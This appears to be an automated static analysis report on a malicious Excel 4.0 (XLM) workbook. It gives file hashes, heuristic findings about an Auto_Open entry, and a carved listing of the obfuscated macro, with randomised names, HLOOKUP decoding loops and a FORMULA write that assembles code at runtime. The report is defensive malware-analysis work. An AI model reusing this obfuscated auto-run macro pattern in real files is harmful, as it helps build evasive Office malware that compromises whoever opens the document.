Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fea2b6362485a887…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-25 10:38:08
Authoring application: Microsoft Excel
First seen: 2021-04-01
MD5: 7d7822e458efa66d35b2c95b3a02aff8
SHA-1: a998afc6e09f83d9c29bcdb1a105b3f63fe97ad4
SHA-256: fea2b6362485a887f689df3e527deb747d941db57329ad6af6ab68ca02cf5a47
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6435 bytes
SHA-256: 40839c4291ad24373ddc05fbad974e0bdd33c726497d76e10548ae341b80cf51
Script preview (first 1,000 lines of the extracted script)
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  juEnH
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!F189 
' 0018     21 LABEL : Cell Value, String Constant - cqZixt len=0 
' 0018     21 LABEL : Cell Value, String Constant - CurgYY len=0 
' 0018     21 LABEL : Cell Value, String Constant - cXnlZf len=0 
' 0018     25 LABEL : Cell Value, String Constant - fbmhoOgkep len=0 
' 0018     24 LABEL : Cell Value, String Constant - fTwWaYFkT len=0 
' 0018     22 LABEL : Cell Value, String Constant - hHJanSX len=0 
' 0018     22 LABEL : Cell Value, String Constant - KoEHOtM len=0 
' 0018     21 LABEL : Cell Value, String Constant - oQALyE len=0 
' 0018     22 LABEL : Cell Value, String Constant - qFRNlsN len=0 
' 0018     23 LABEL : Cell Value, String Constant - rLmVqKUI len=0 
' 0018     24 LABEL : Cell Value, String Constant - RMrOKllQI len=0 
' 0018     27 LABEL : Cell Value, String Constant - RszBzYyVKmGY len=0 
' 0018     20 LABEL : Cell Value, String Constant - TYfPu len=0 
' 0018     26 LABEL : Cell Value, String Constant - USyNcPYDIgS len=0 
' 0018     27 LABEL : Cell Value, String Constant - utWllbbaEYOG len=0 
' 0018     26 LABEL : Cell Value, String Constant - VHpMSkBwiML len=0 
' 0018     20 LABEL : Cell Value, String Constant - VPHvA len=0 
' 0018     27 LABEL : Cell Value, String Constant - yfPRHtCopCaz len=0 
' 0018     21 LABEL : Cell Value, String Constant - yLhUcU len=0 
' 0018     21 LABEL : Cell Value, String Constant - YpgDkn len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  juEnH,F92,"SET.NAME("fTwWaYFkT",VALUE("0"))",""
'  juEnH,F97,"SET.NAME("VPHvA",fTwWaYFkT)",""
'  juEnH,F99,"SET.NAME("USyNcPYDIgS",fTwWaYFkT)",""
'  juEnH,F104,"SET.NAME("oQALyE",COUNTA(yfPRHtCopCaz))",""
'  juEnH,F109,"SET.NAME("cXnlZf",COUNTA(RszBzYyVKmGY))",""
'  juEnH,F111,[],""
'  juEnH,F116,"SET.NAME("cqZixt","")",""
'  juEnH,F119,"VPHvA",""
'  juEnH,F124,"SET.NAME("hHJanSX",HLOOKUP("*",yfPRHtCopCaz,VPHvA,FALSE))",""
'  juEnH,F126,"YpgDkn",""
'  juEnH,F129,"SET.NAME("KoEHOtM",fTwWaYFkT)",""
'  juEnH,F131,[],""
'  juEnH,F135,"KoEHOtM",""
'  juEnH,F137,"qFRNlsN",""
'  juEnH,F139,"VHpMSkBwiML",""
'  juEnH,F142,"rLmVqKUI",""
'  juEnH,F145,"SET.NAME("CurgYY",VALUE(HLOOKUP("*",RszBzYyVKmGY,rLmVqKUI,FALSE)))",""
'  juEnH,F150,"TYfPu",""
'  juEnH,F155,"cqZixt",""
'  juEnH,F160,"USyNcPYDIgS",""
'  juEnH,F165,NEXT(),""
'  juEnH,F169,"utWllbbaEYOG",""
'  juEnH,F174,"SET.NAME("f",INT(T(FORMULA(T(cqZixt)&"",""&T(utWllbbaEYOG)))))",""
'  juEnH,F176,"fbmhoOgkep",""
'  juEnH,F180,NEXT(),""
'  juEnH,F185,RETURN(),""
'  juEnH,F218,"SET.NAME("yLhUcU",F92)",""
'  juEnH,F223,"yfPRHtCopCaz",""
'  juEnH,F225,"SET.NAME("RszBzYyVKmGY",R72C13)",""
'  juEnH,F230,"SET.NAME("fbmhoOgkep",236)",""
'  juEnH,F232,"SET.NAME("RMrOKllQI",6)",""
'  juEnH,F235,yLhUcU(),""
'  juEnH,F236,HALT(),""